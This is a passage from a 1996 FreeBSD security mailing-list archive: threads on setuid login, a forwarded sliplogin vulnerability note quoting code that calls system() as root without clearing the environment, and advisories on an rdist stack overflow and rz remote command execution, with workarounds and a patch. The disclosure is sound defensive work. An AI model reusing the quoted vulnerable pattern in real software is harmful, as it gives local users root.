[198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id KAA11124; Tue, 16 Jul 1996 10:39:14 -0400 (EDT) Date: Tue, 16 Jul 1996 10:39:14 -0400 (EDT) From: Brian Tao To: Sean Kelly cc: phk@freebsd.org, freebsd-security@freebsd.org Subject: Re: suidness of /usr/bin/login In-Reply-To: <199607161434.OAA26815@gatekeeper.fsl.noaa.gov> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 16 Jul 1996, Sean Kelly wrote: > > exec /usr/bin/login > > to terminate one login session and start another, on the same tty/pty. > In fact, csh/tcsh has a builtin `login' which does the exec. Other than that, there is no real need for it to be setuid root (since telnetd and getty are both already running as root). I guess this would put it under "setuid root subject to local policy". -- Brian Tao (BT300, taob@io.org, taob@ican.net) Senior Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Tue Jul 16 07:40:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA28893 for security-outgoing; Tue, 16 Jul 1996 07:40:28 -0700 (PDT) Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA28885 for ; Tue, 16 Jul 1996 07:40:26 -0700 (PDT) Received: from emu.fsl.noaa.gov (kelly@emu.fsl.noaa.gov [137.75.60.32]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id OAA26856; Tue, 16 Jul 1996 14:40:15 GMT Message-Id: <199607161440.OAA26856@gatekeeper.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.4/16.2) id AA107078045; Tue, 16 Jul 1996 08:40:45 -0600 Date: Tue, 16 Jul 1996 08:40:45 -0600 From: Sean Kelly To: taob@io.org Cc: explorer@flame.org, freebsd-security@FreeBSD.org In-Reply-To: (message from Brian Tao on Tue, 16 Jul 1996 00:37:14 -0400 (EDT)) Subject: Re: suidness of /usr/bin/login Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk >>>>> "Brian" == Brian Tao writes: >> you can always use ``login foo'' and that is supposed to let >> someone else log in, kinda in mid session and all. Brian> Hmmm... that's hardly ever done, at least around here. Brian> "exec telnet localhost" would serve the same purpose Except that telnet allocates a pty while keeping the current tty/pty in use. After while, you might run out. Or not. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Tue Jul 16 07:48:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA29449 for security-outgoing; Tue, 16 Jul 1996 07:48:22 -0700 (PDT) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA29367; Tue, 16 Jul 1996 07:48:00 -0700 (PDT) Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA20265; Tue, 16 Jul 1996 10:46:50 -0400 Date: Tue, 16 Jul 1996 10:46:50 -0400 From: Garrett Wollman Message-Id: <9607161446.AA20265@halloran-eldar.lcs.mit.edu> To: Brian Tao Cc: Poul-Henning Kamp , FREEBSD-SECURITY-L Subject: suidness of /usr/bin/login In-Reply-To: References: <4914.837416816@critter.tfs.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk < said: > On Mon, 15 Jul 1996, Poul-Henning Kamp wrote: >> >> Make a list of them all, remove setuid on any you don't use. Consider >> carefully the minimum permissions you can get away with on the rest. > Does /usr/bin/login need to be setuid root? Yes. It is intended to be executable interactively from the command line: user1@foo$ exec login user2 Password: user2@foo$ -GAWollman -- Garrett A. Wollman | Shashish is simple, it's discreet, it's brief. ... wollman@lcs.mit.edu | Shashish is the bonding of hearts in spite of distance. Opinions not those of| It is a bond more powerful than absence. We like people MIT, LCS, ANA, or NSA| who like Shashish. - Claude McKenzie + Florent Vollant From owner-freebsd-security Tue Jul 16 08:06:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA00973 for security-outgoing; Tue, 16 Jul 1996 08:06:14 -0700 (PDT) Received: from www.trifecta.com (www.trifecta.com [206.245.150.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA00966; Tue, 16 Jul 1996 08:06:11 -0700 (PDT) Received: (from dev@localhost) by www.trifecta.com (8.7.5/8.6.12) id LAA20845; Tue, 16 Jul 1996 11:04:23 -0400 (EDT) Date: Tue, 16 Jul 1996 11:04:23 -0400 (EDT) From: Dev Chanchani To: Brian Tao cc: Poul-Henning Kamp , FREEBSD-SECURITY-L Subject: Re: suidness of /usr/bin/login In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Brian Tao wrote: > Does /usr/bin/login need to be setuid root? Since it is normally > only called by telnetd (which already runs as root), does it have to > be setuid root as well? What else uses it? xterm (which itself is > also setuid root)? k /usr/bin/login only needs to be suid root for people to "re-login" so their uid can be set. If the only users on your system that need to su are in the wheel group, you can take the suid bit of /usr/bin/login. xterm does not need to be suid if users do not run xwindows. Dev Chanchani http://www.interactive.trifecta.com From owner-freebsd-security Tue Jul 16 09:00:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA05573 for security-outgoing; Tue, 16 Jul 1996 09:00:35 -0700 (PDT) Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA05562; Tue, 16 Jul 1996 09:00:33 -0700 (PDT) Received: from emu.fsl.noaa.gov (kelly@emu.fsl.noaa.gov [137.75.60.32]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id QAA27336; Tue, 16 Jul 1996 16:00:25 GMT Message-Id: <199607161600.QAA27336@gatekeeper.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.4/16.2) id AA108182855; Tue, 16 Jul 1996 10:00:55 -0600 Date: Tue, 16 Jul 1996 10:00:55 -0600 From: Sean Kelly To: taob@io.org Cc: phk@freebsd.org, freebsd-security@freebsd.org In-Reply-To: (message from Brian Tao on Tue, 16 Jul 1996 10:39:14 -0400 (EDT)) Subject: Re: suidness of /usr/bin/login Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >>>>> "Brian" == Brian Tao writes: Brian> Other than that, there is no real need for it to be Brian> setuid root (since telnetd and getty are both already Brian> running as root). I guess this would put it under "setuid Brian> root subject to local policy". Exactly. It's not a terribly useful feature anyway and of all whom I know are even aware of it, none make use of it. You can always log out and back in! -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Tue Jul 16 09:10:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA06621 for security-outgoing; Tue, 16 Jul 1996 09:10:12 -0700 (PDT) Received: from itsdsv1.enc.edu (itsdsv1.enc.edu [199.93.252.241]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id JAA06600 for ; Tue, 16 Jul 1996 09:10:06 -0700 (PDT) Received: from dingo.enc.edu (dingo.enc.edu [199.93.252.229]) by itsdsv1.enc.edu (8.6.12/8.6.9) with SMTP id MAA28099 for ; Tue, 16 Jul 1996 12:09:32 -0400 Date: Fri, 12 Jul 1996 15:49:36 -0400 (EDT) From: Charles Owens To: questions list FreeBSD Subject: suidperl v5.003 won't SUID Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII ReSent-Date: Tue, 16 Jul 1996 12:16:02 -0400 (EDT) ReSent-From: Charles Owens ReSent-To: freebsd-security@freebsd.org ReSent-Message-ID: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi, I've just compiled and installed perl 5.003 and SUID scripts aren't working. Any reason why it should work differently than 5.001? Is there any FreeBSD-specific patching that needs to be done (I just ftp'd it from CPAN and compiled)? The move to 5.003, of course, was prompted by the recent CERT advisory. If I have the following script set suid to root, it worked as expected with 5.001, but with 5.003 _nothing_ happens (no error... nothing). #!/usr/local/bin/perl print "\$<: $<\t\t\$>: $>\n"; Thanks, --- ------------------------------------------------------------------------- Charles Owens Email: owensc@enc.edu "I read somewhere to learn is to Information Technology Services remember... and I've learned that Eastern Nazarene College we've all forgot..." - King's X ------------------------------------------------------------------------- From owner-freebsd-security Tue Jul 16 11:33:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA20959 for security-outgoing; Tue, 16 Jul 1996 11:33:36 -0700 (PDT) Received: from janus.scccc.com ([206.247.109.222]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA20942 for ; Tue, 16 Jul 1996 11:33:27 -0700 (PDT) Received: (from uucp@localhost) by janus.scccc.com (8.6.12/8.6.12) id MAA09340 for <@janus.scccc.com:freebsd-security@freebsd.org>; Tue, 16 Jul 1996 12:31:36 -0600 Received: from natasha.scccc.com(198.243.16.198) by janus.scccc.com via smap (V1.3) id sma009338; Tue Jul 16 12:31:26 1996 Received: by natasha.scccc.com (940816.SGI.8.6.9/940406.SGI) for freebsd-security@freebsd.org id MAA05206; Tue, 16 Jul 1996 12:06:52 -0600 From: "Kevin J. Duling" Message-Id: <9607161206.ZM5204@natasha.scccc.com> Date: Tue, 16 Jul 1996 12:06:52 -0600 In-Reply-To: jaeger "Re: ROOT COMPROMISE" (Jul 12, 11:12pm) References: X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) To: freebsd-security@freebsd.org Subject: Re: ROOT COMPROMISE Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Jul 12, 11:12pm, jaeger wrote: > Subject: Re: ROOT COMPROMISE > shell; it isn't clear from the logs just what this is, exploit or backdoor. > It's very refreshing to see actual cracking activity discussed. > Excepting a few papers from years ago, Shimomura's excellent dissection of > the Christmas '94 attack on his box, and a few recent bits and pieces, the > white hats don't get to see much of the actual intruder activity that's > going on. Please keep up the status reports :). > > -jaeger >-- End of excerpt from jaeger I'll second that. -- Kevin J. Duling /\/^\^/^\^\/\ SCC Communications Corp. kduling@scc911.com Boulder, Colorado (303) 581-5769 From owner-freebsd-security Tue Jul 16 12:47:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA03603 for security-outgoing; Tue, 16 Jul 1996 12:47:26 -0700 (PDT) Received: from red.jnx.com (ppp-2-156.sntc01.pacbell.net [206.170.2.156]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA03589 for ; Tue, 16 Jul 1996 12:47:23 -0700 (PDT) Received: from base.jnx.com (base.jnx.com [208.197.169.238]) by red.jnx.com (8.7.5/8.7.3) with ESMTP id MAA09719; Tue, 16 Jul 1996 12:46:13 -0700 (PDT) Received: (from pst@localhost) by base.jnx.com (8.7.5/8.7.3) id MAA14415; Tue, 16 Jul 1996 12:47:11 -0700 (PDT) To: chaos@ultra.net.au (Simon Coggins) cc: security@freebsd.org Subject: Re: is there a current list of security problems in Freebsd-stable? References: From: Paul Traina Date: 16 Jul 1996 12:47:08 -0700 In-Reply-To: chaos@ultra.net.au's message of 16 Jul 96 00:12:57 GMT Message-ID: <7y7ms4aslf.fsf@base.jnx.com> Lines: 6 X-Mailer: Gnus v5.2.25/XEmacs 19.14 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk chaos@ultra.net.au (Simon Coggins) writes: > Is there a list of problms for the 2.1.0-R laying around somewhere ? ftp://freebsd.org/pub/CERT/advisories/* From owner-freebsd-security Tue Jul 16 16:03:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA07386 for security-outgoing; Tue, 16 Jul 1996 16:03:09 -0700 (PDT) Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA07375 for ; Tue, 16 Jul 1996 16:03:06 -0700 (PDT) Received: from umbc7.umbc.edu (f-umbc7.umbc.edu) by mail.crl.com with SMTP id AA23593 (5.65c/IDA-1.5 for ); Tue, 16 Jul 1996 16:02:32 -0700 Received: (from pauld@localhost) by umbc7.umbc.edu (8.6.12/Umbc) id TAA08854; Tue, 16 Jul 1996 19:00:32 -0400 Date: Tue, 16 Jul 1996 19:00:30 -0400 (EDT) From: Paul Danckaert To: freebsd-security@freebsd.org Subject: [linux-security] sliplogin (fwd) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Interesting. The code is the same on FreeBSD, it looks like. However, on the default distributed system, there isn't a /etc/sliphome directory, which is necessary for sliplogin to startup correctly. Therefore the standard FreeBSD distribution dies out before it gets anywhere near the system command. If you do run slip off of your system however, its much more possible that bad things can happen.. paul ---------- Forwarded message ---------- Date: Tue, 16 Jul 1996 15:27:19 -0500 From: David Holland To: Multiple recipients of list BUGTRAQ Subject: [linux-security] sliplogin Anyone running a version of sliplogin older than sliplogin-2.1.0 (which can be gotten from sunsite.unc.edu:/pub/Linux/system/Network/serial or ftp.uk.linux.org:/pub/linux/Networking/transports) should remove it or upgrade it immediately. It does setuid(0); if (s = system(logincmd)) { : } without clearing the environment first. Therefore, anybody can get root trivially. The sliplogin from NetKit-B-0.06 is affected. Current RedHat sliplogin is not affected. Others I don't know about. -- - David A. Holland | Number of words in the English language that dholland@hcs.harvard.edu | exist because of typos or misreadings: 381 From owner-freebsd-security Tue Jul 16 16:44:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA14339 for security-outgoing; Tue, 16 Jul 1996 16:44:03 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA14291 for ; Tue, 16 Jul 1996 16:43:58 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id RAA27085; Tue, 16 Jul 1996 17:43:48 -0600 (MDT) Date: Tue, 16 Jul 1996 17:43:48 -0600 (MDT) Message-Id: <199607162343.RAA27085@rocky.mt.sri.com> From: Nate Williams To: Paul Danckaert Cc: freebsd-security@freebsd.org Subject: Re: [linux-security] sliplogin (fwd) In-Reply-To: References: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk [ Linux sliplogin bug ] > Interesting. The code is the same on FreeBSD, it looks like. However, on > the default distributed system, there isn't a /etc/sliphome directory, > which is necessary for sliplogin to startup correctly. Therefore the > standard FreeBSD distribution dies out before it gets anywhere near the > system command. If you do run slip off of your system however, its much > more possible that bad things can happen.. Also, note the following: revision 1.6 date: 1996/04/24 20:18:25; author: pst; state: Exp; lines: +9 -0 Close a security hole in sliplogin. If you use sliplogin as a user shell (in /etc/passwd) upgrade to this version. Reviewed by: bde, peter Submitted by: AUS CERT Obtained from: Linux sliplogin-2.02 So, even if you setup /etc/sliphome, your system won't be vulnerable. Nate From owner-freebsd-security Tue Jul 16 18:30:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA29969 for security-outgoing; Tue, 16 Jul 1996 18:30:52 -0700 (PDT) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA29960 for ; Tue, 16 Jul 1996 18:30:49 -0700 (PDT) Received: (from obrien@localhost) by relay.nuxi.com (8.6.12/8.6.12) id SAA20049 for freebsd-security@freebsd.org; Tue, 16 Jul 1996 18:30:54 -0700 From: "David E. O'Brien" Message-Id: <199607170130.SAA20049@relay.nuxi.com> Subject: Re: suidness of /usr/bin/login To: freebsd-security@freebsd.org Date: Tue, 16 Jul 1996 18:30:54 -0700 (PDT) In-Reply-To: <199607161600.QAA27336@gatekeeper.fsl.noaa.gov> from "Sean Kelly" at Jul 16, 96 10:00:55 am X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Brian> Other than that, there is no real need for it to be > Brian> setuid root (since telnetd and getty are both already > Brian> running as root). I guess this would put it under "setuid > Brian> root subject to local policy". > > Exactly. It's not a terribly useful feature anyway and of all whom I > know are even aware of it, none make use of it. You can always log > out and back in! Not even very useful in Solaris 2.5 running X if you remember you can do this. So why keep it around??? How about a proposal to NOT make login suid in FBSD releases? kongur:~> login login: obrien Password: No utmpx entry. You must exec "login" from the lowest level "shell". kongur:~> -- David (obrien@cs.ucdavis.edu) From owner-freebsd-security Tue Jul 16 21:56:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA24800 for security-outgoing; Tue, 16 Jul 1996 21:56:51 -0700 (PDT) Received: from precipice.shockwave.com (ppp-5-67.rdcy01.pacbell.net [206.170.5.67]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA24785 for ; Tue, 16 Jul 1996 21:56:48 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id VAA01645 for ; Tue, 16 Jul 1996 21:56:14 -0700 (PDT) Resent-Message-Id: <199607170456.VAA01645@precipice.shockwave.com> Message-Id: <199607170456.VAA01645@precipice.shockwave.com> From: "FreeBSD Security Officer" To: freebsd-security-notification@freebsd.org cc: freebsd-announce@freebsd.org, security-officer@freebsd.org Subject: FreeBSD Security Advisory 96:16 - rdist Date: Tue, 16 Jul 1996 21:52:09 -0700 Resent-To: security@freebsd.org Resent-Date: Tue, 16 Jul 1996 21:56:14 -0700 Resent-From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:16 Security Advisory Revised: Fri Jul 12 09:32:53 PDT 1996 FreeBSD, Inc. Topic: security vulnerability in rdist Category: core Module: rdist Announced: 1996-07-12 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: 2.1-stable and 2.2-current as of 1996-07-11 Source: 4.4BSD (lite) FreeBSD only: no Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:16/ Reference: [8lgm]-Advisory-26.UNIX.rdist.20-3-1996 ============================================================================= I. Background A bug was found in the BSD rdist utility which can allow an unprivileged local user to gain unauthorized access. This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-07-12. rdist has been the subject of security vulnerabilities in the past. This is a newly discovered vulnerability not related to previous race conditions fixed in rdist. II. Problem Description rdist creates an error message based on a user provided string, without checking bounds on the buffer used. This buffer is on the stack, and can therefore be used to execute arbitrary instructions. III. Impact This vulnerability can allow a local user to obtain superuser privileges. It may only be exploited by users with a valid account on the local system. It is present in almost all BSD derived operating systems with a "setuid" rdist program. IV. Workaround The rdist program must be setuid root to function properly. This vulnerability can be eliminated by making rdist not executable by unprivileged users. Since this limits the usefulness of the program, a software update is advised. This workaround will work for all versions of FreeBSD affected by this problem. As root, execute the commands: # chflags noschg /usr/bin/rdist # chmod u-s,go-rx /usr/bin/rdist then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-x------" as shown here: # ls -l /usr/bin/rdist -r-x------ 1 root bin 49152 Jun 16 10:46 rdist V. Solution(s) Apply the available via FTP from the patch directory noted at the top of this message. Recompile, and reinstall the rdist program. This patch is known to apply to all FreeBSD 2.x systems, it has not been tested with FreeBSD 1.x. The [8lgm] organization correctly points out that this program does not have a particularly good security "history." While the patch for this vulnerability does solve this particular problem, it's not clear if other security issues involving rdist will appear in the future. Administrators should consider whether it is appropriate to remove the standard rdist program and upgrade to rdist version 6, which is available as a FreeBSD port. FreeBSD, Inc. has not replaced the standard BSD rdist with the newer code because the new rdist is not protocol-compatible with the original version. ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMeaC1FUuHi5z0oilAQHtzQP/U1f9y0R+upwCs5IFeBCUBVkFWUeJ/Wwb CJPFmsBr54quI6Aie/LXa/Qw8EdrL54GIiNDZYkAzb9XvWOehOsmtoYN4oj0JAbJ lesq746xOEfNMtpL866T8dxJRTsK98VMSaZK5IU8fVpVYUURcVDv+y+bqfL72Mst 3ajof2ieNxE= =j2z5 -----END PGP SIGNATURE----- From owner-freebsd-security Tue Jul 16 21:57:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA24856 for security-outgoing; Tue, 16 Jul 1996 21:57:04 -0700 (PDT) Received: from precipice.shockwave.com (ppp-5-67.rdcy01.pacbell.net [206.170.5.67]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA24841 for ; Tue, 16 Jul 1996 21:57:00 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id VAA01654 for ; Tue, 16 Jul 1996 21:56:27 -0700 (PDT) Resent-Message-Id: <199607170456.VAA01654@precipice.shockwave.com> Message-Id: <199607170456.VAA01654@precipice.shockwave.com> From: "FreeBSD Security Officer" To: freebsd-security-notification@freebsd.org cc: freebsd-announce@freebsd.org, security-officer@freebsd.org Subject: FreeBSD Security Advisory 96:17 - rzsz Date: Tue, 16 Jul 1996 21:53:16 -0700 Resent-To: security@freebsd.org Resent-Date: Tue, 16 Jul 1996 21:56:26 -0700 Resent-From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:17 Security Advisory Revised: Tue Jul 16 21:44:54 PDT 1996 FreeBSD, Inc. Topic: "Trojan Horse" vulnerability via rz program Category: ports Module: rzsz Announced: 1996-07-16 Affects: All FreeBSD ports collections released before 2.1.5-RELEASE Corrected: ports collection as of 1996-07-06 Source: rzsz shareware package FreeBSD only: no Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:17/ ============================================================================= I. Background All existing versions of the rz program (a program for receiving files over serial lines using the Z-Modem protocol) are equipped with a feature that allows the sender of a file to request the execution of arbitrary commands on the receiver's side. The user using rz does not have any control over this feature. The workaround is to have rz never execute any command, and always pretend a successful execution. All FreeBSD users are encouraged to use the workaround provided. Since the intent of the Z-Modem protocol is to provide a reliable connection between systems of a vastly different architecture, the execution of local commands at request of the sending side cannot even be considered a useful feature at all. II. Problem Description The Z-Modem protocol specifies a mechanism which allows the transmitter of a file to execute an arbitrary command string as part of the file transfer. This is typically used to rename files or eliminate temporary files. A malicious "trusted" sender could send down a command that could damage a user's environment. III. Impact The rzsz package is an optional port that made be installed on some FreeBSD systems. This program is not installed by default. Systems without this program are not vulnerable. rz allows "Trojan Horse" type attacks against unsuspecting users. Since the rz executable does not run with special privileges, the vulnerability is limited to changes in the operating environment that the user could willingly perform. This vulnerability is a fundamental flaw in the Z-Modem protocol. Other operating systems and other implementations of the Z-Modem protocol may also suffer similar vulnerabilities. IV. Workaround Disable the rz program. If it has been installed, it would typically be found in /usr/local/bin. # chmod 000 /usr/local/bin/rz # ls -l /usr/local/bin/rz ---------- 1 root wheel 23203 Mar 4 23:12 /usr/local/bin/rz V. Solution(s) This feature is a relatively unknown part of the Z-Modem protocol. It is not critical to file transfers in general. The safest approach is to disable this feature in the receiving program. Any rzsz port that is obtained from the official ports collection after 1996-07-06 includes the following patch to disable this feature. This patch applies to rzsz v3.42, if you have an earlier version of the rzsz sources, please upgrade to the latest version first. *** rz.c.orig Sat Jul 6 17:34:26 1996 --- rz.c Sat Jul 6 17:44:52 1996 *************** *** 1020,1039 **** --- 1020,1045 ---- case ZCOMMAND: cmdzack1flg = Rxhdr[ZF0]; if (zrdata(secbuf, 1024) == GOTCRCW) { + #ifdef BIG_SECURITY_HOLE void exec2(); if (cmdzack1flg & ZCACK1) stohdr(0L); else stohdr((long)sys2(secbuf)); + #else + stohdr(0L); + #endif purgeline(); /* dump impatient questions */ do { zshhdr(4,ZCOMPL, Txhdr); } while (++errors<20 && zgethdr(Rxhdr) != ZFIN); ackbibi(); + #ifdef BIG_SECURITY_HOLE if (cmdzack1flg & ZCACK1) exec2(secbuf); + #endif return ZCOMPL; } zshhdr(4,ZNAK, Txhdr); goto again; ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMexwFlUuHi5z0oilAQFY8wQAmIkv2scipc+ABrQCfHpSWapM+v2J7s8S 7pqt4ZIdkt5jwBatY4NnsScDAIIYO/chP29hn3sNiHohv/4j1DXoXE57fLCeBkrh SbcY20X5YqpuUqScVTEsJBm40GNf7k98GNtgmLwd/NojRgchIdbx4zJSVo/3H1yK oJdvhrzsGpE= =mZ88 -----END PGP SIGNATURE----- From owner-freebsd-security Tue Jul 16 23:02:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA02019 for security-outgoing; Tue, 16 Jul 1996 23:02:51 -0700 (PDT) Received: from seraph.uunet.ca (uunet.ca [142.77.1.254]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA02012 for ; Tue, 16 Jul 1996 23:02:49 -0700 (PDT) Received: from now by seraph.uunet.ca with UUCP id <249618-8941>; Wed, 17 Jul 1996 02:02:45 -0400 Received: from business.now.com by vishnu.now.com with bsmtp (Smail3.1.29.1 #8) id m0ugP2g-0009zVC; Wed, 17 Jul 96 01:20 EDT Received: by business.now.com (Smail3.1.29.1 #12) id m0ugP3m-00001MC; Wed, 17 Jul 96 01:22 EDT Message-Id: From: erics@now.com (Eric Siegerman) Subject: Re: suidness of /usr/bin/login (fwd) To: freebsd-security@freebsd.org Date: Wed, 17 Jul 1996 01:22:06 -0400 X-Mailer: ELM [version 2.4 PL25] Content-Type: text/plain; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Dev Chanchani wrote: > /usr/bin/login only needs to be suid root for people to "re-login" so > their uid can be set. A couple of data points: - UnixWare (an SVR4.2 port) sets login to mode 550, with ownership root:bin. - Xenix sets it mode 700, ownership bin:bin -- and goes the extra step of putting it in /etc (Xenix's file-system organization predates the etc-sbin-libexec split). Both of these obviously decided the relogin feature was dispensable. Useless historical trivia: Someone mentioned that CSH recognizes "login" and execs the login program directly, without forking first. This feature dates back at least as far as 6th Edition; it's not just a CSHism. It's basically analogous to newgrp(1), and was exactly analogous back then, when a process had only one effective gid. Expect to find this obscure feature in many (most?) shells on many (most?) non-free variants of Unix, ie. those ultimately descended from Bell-Labs Unix. It's vestigial on systems where login has lost its privilege, but is likely in the code nonetheless. (All three of UnixWare 1.1.2's shells try to do this thing, but only in csh(1) is it documented -- and, even if login can be executed, only in KSH does it still work properly :-) That ASH doesn't do this is arguably an incompatibility with Bourne Shell; I'll leave it to others to decide whether it's worth the bother of fixing. (The rationale for doing so is that users might forget that they were nested, and not sign all the way off. Of course, su has that "problem" too... But in 6th Ed, su didn't accept arguments; it was hardwired to become root. I guess people who (legitimately) had the root password were presumed to be too careful to make such mistakes.) -- | | /\ |-_|/ > Eric Siegerman, Toronto, Ont. erics@now.com | | / The government lacked the ability. The rich lacked the compassion, the middle class lacked the willpower, the poor lacked the means. - Lisa Mason From owner-freebsd-security Wed Jul 17 01:40:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA09688 for security-outgoing; Wed, 17 Jul 1996 01:40:35 -0700 (PDT) Received: from silver.sms.fi (root@silver.sms.fi [194.111.122.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA09653 for ; Wed, 17 Jul 1996 01:40:20 -0700 (PDT) Received: (from pete@localhost) by silver.sms.fi (8.7.5/8.6.9) id LAA03606; Wed, 17 Jul 1996 11:39:36 +0300 (EET DST) Date: Wed, 17 Jul 1996 11:39:36 +0300 (EET DST) Message-Id: <199607170839.LAA03606@silver.sms.fi> From: Petri Helenius To: Will Brown Cc: freebsd-security@freebsd.org Subject: routing security? In-Reply-To: <199607041418.KAA00137@selway.i.com> References: <199607041418.KAA00137@selway.i.com> Sender: owner-security@freebsd.org 